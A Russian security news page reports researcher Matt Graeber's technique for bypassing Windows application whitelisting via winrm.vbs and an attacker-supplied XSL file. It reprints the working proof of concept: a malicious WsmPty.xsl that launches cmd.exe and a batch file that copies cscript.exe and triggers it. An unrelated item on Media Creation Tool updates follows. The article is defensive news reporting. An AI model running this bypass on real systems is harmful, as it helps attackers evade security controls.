В Windows найден метод обхода белых списков приложений
Главная » Новости
Гибридные облака: как и зачем их строятДо 70% российских компаний уже используют гибридное облако: часть инфраструктуры остаётся on-prem, часть переносится в публичные облака. Это рабочая модель, которая ускоряет запуск сервисов, даёт гибкое масштабирование и поддержку AI-нагрузок при сохранении контроля над данными. 14 мая в 11:00 в эфире AM Live разберём, как работает гибрид, когда облака дают максимум выгоды, как выбрать провайдера и какие ошибки чаще всего допускают→ Зарегистрироваться
Реклама. ООО «АМ Медиа», ИНН 7703628151, 16+

В Windows найден метод обхода белых списков приложений

Олег Иванов 16 Июля 2018 - 08:51
...
В Windows найден метод обхода белых списков приложений

Исследователь в области кибербезопасности Мэтт Гребер нашел интересный метод обхода белых списков приложений в Windows. Помимо этого, эксперт описал технику выполнения произвольного неподписанного кода в winrm.vbs.

winrm.vbs (подписанный Windows скрипт в System32) способен выполнять контролируемый злоумышленником XSL, который не попадет под ограничения «enlightened script host», в результате это приведет к выполнению произвольного неподписанного кода.

«Если вы добавляете “-format:pretty” или “ -format:text” в winrm.vbs, он вытащит WsmPty.xsl или WsmTxt.xsl из каталога, в котором находится cscript.exe. Это значит, что атакующий может скопировать cscript.exe в нужное ему место, где находится вредоносный XSL», — пишет специалист.

«Благодаря этому киберпреступник может добиться выполнения произвольного неподписанного кода. Эта техника практически идентична описанному Кейси Смитом методу с использованием wmic.exe».

Что касается Proof-of-Concept, эксперт опубликовал следующие шаги:

  1. Поместить вредоносный файл WsmPty.xsl или WsmTxt.xsl в контролируемую атакующим директорию.
  2. Скопировать файл cscript.exe или wscript.exe в ту же самую директорию.
  3. Выполнить winrm.vbs с «-format», указав «pretty» (если был помещен файл WsmPty.xsl) или «text» (если был помещен файл WsmTxt.xsl).

Исследователь привел пример вредоносного XSL, который можно поместить в контролируемый злоумышленником каталог. В качестве примера эксперт помещает файл по этому пути — C:\BypassDir\WsmPty.xsl.

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="JScript">
 <![CDATA[
 var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
 ]]> </ms:script>
</stylesheet>

Грамотное оформление вредоносного файла WsmPty.xsl должно включать использование встроенного пейлоада DotNetToJScript, приводящего к выполнению произвольного кода.

«В процессе помещения файла WsmPty.xsl можно использовать следующий пакетный файл для запуска пейлоада», — объясняет эксперт:

mkdir %SystemDrive%\BypassDir
copy %windir%\System32\cscript.exe %SystemDrive%\BypassDir
%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty
Следующая главная новость »
AM LiveЗащита мобильных приложений: где бизнес теряет данные?
Регистрируйтесь на эфир!

Media Creation Tool теперь скачивает Windows 11 с обновлением KB5089549
Екатерина Быстрова 15 Мая 2026 - 13:00
Windows Домашние пользователиКорпорации Microsoft
Media Creation Tool теперь скачивает Windows 11 с обновлением KB5089549

Microsoft обновила содержимое Media Creation Tool: теперь утилита загружает свежие образы Windows 11 25H2 и 24H2 с апрельским обновлением KB5089549. Тем, кто хочет по-взрослому собрать загрузочную флешку, теперь выдадут более актуальную систему.

KB5089549 вышло в рамках свежего набора патчей для Windows 11.

У большинства пользователей обновление, судя по сообщениям, ставится без особой драмы, хотя отдельные жалобы на проблемы с установкой и сетью всё же есть. Массовой катастрофы не наблюдается, но Windows без мелкого сюрприза — это уже почти не Windows.

Media Creation Tool остаётся официальной утилитой Microsoft для создания загрузочного ISO или USB-носителя. Она скачивает Windows напрямую с серверов компании, и сейчас для Windows 11 25H2 подтягивает сборку 26200.8457 с KB5089549.

Любопытно, что версия самой утилиты не изменилась и по-прежнему числится как 10.0.26100.7019. После выхода Windows 11 25H2 Media Creation Tool успела отличиться багами как на Windows 11, так и на Windows 10. Особенно иронично это выглядело на фоне окончания поддержки Windows 10, когда Microsoft активно подталкивала пользователей к переходу на Windows 11, а один из главных инструментов для апгрейда сам спотыкался на ровном месте.

Сейчас, по данным Deskmodder, в новой сборке MCT проблемы для Windows 11 исправлены. Ошибки, связанные с Windows 10, также поправили, хотя последнее ESU-обновление для этой системы через Media Creation Tool не распространяется.

Скачать Media Creation Tool можно с официального сайта Microsoft в разделе создания установочного носителя Windows 11 или Windows 10. На момент публикации образ также должен включать актуальное обновление Windows Defender.

AM LiveЗащита мобильных приложений: где бизнес теряет данные?
Регистрируйтесь на эфир!
Роскомнадзор аннулировал почти 2 тыс. лицензий операторов связи
Новость
Роскомнадзор аннулировал почти 2 тыс. лицензий операторов св...
Microsoft признала проблему: в Windows 11 хотят сократить рекламу
Новость
Microsoft признала проблему: в Windows 11 хотят сократить ре...
Яндекс: мы не фиксировали случаев взлома умных колонок
Новость
Яндекс: мы не фиксировали случаев взлома умных колонок

RSS: Новости на портале Anti-Malware.ru

Свидетельство о регистрации СМИ ЭЛ № ФС 77 - 68398, выдано федеральной службой по надзору в сфере связи, информационных технологий и массовых коммуникаций (Роскомнадзор) 27.01.2017
Разрешается частичное использование материалов на других сайтах при наличии ссылки на источник. Использование материалов сайта с полной копией оригинала допускается только с письменного разрешения администрации.

© ООО "АМ Медиа", 2005-2026. Все права защищены.